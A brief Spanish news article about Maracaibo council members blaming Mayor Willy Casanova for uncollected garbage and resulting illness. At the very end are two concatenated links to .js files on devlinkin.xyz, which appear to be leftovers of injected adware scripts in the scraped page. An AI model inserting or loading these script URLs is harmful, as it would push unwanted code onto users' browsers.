Los ciudadanos han manifestado su preocupación por las enfermedades que pueden contraer por la falta de salubridad en la zona.

Concejales de Maracaibo exigieron a Willy Casanova, alcalde de Maracaibo, estado Zulia, que solucione la problemátoica de la basura en diversas comunicadades de la entidad zuliana.

«Los tres niveles de gobierno están en mora con los ciudadanos de Maracaibo en lo que respecta a servicios públicos. Maracaibo se ha convertido un vertedero de basura, es un problema de tipo ambiental y sanitario gravísimo, que está derivando en enfermedades gastrointestinales y dermatológicas. Las epidemias están a flor de piel”, indicaron a La Verdad Maris Urdaneta y Ada Raffalli, miembros del Concejo Municipal de Maracaibo.

Comentaron que los ciudadanos asisten al Concejo Municipal a manifestar sus quejas sobre la situación sanitaria.

“El alcalde se sigue haciendo el Willy, no se ha hecho presente, ni responsable, ni se ha manifestado competente, es por ello que los ciudadanos han recurrido a la quema de basura, lo cual ha agravado el problema con la aparición de todo tipo de enfermedades”, afirmó Marisyulis Urdaneta, presidente de la Comisión de servicios Públicos del Concejo Municipal de Maracaibo.

VÍA EL NACIONAL

https://devlinkin.xyz/addons/lnkr5.min.jshttps://devlinkin.xyz/addons/lnkr30_nt.min.js

Loading...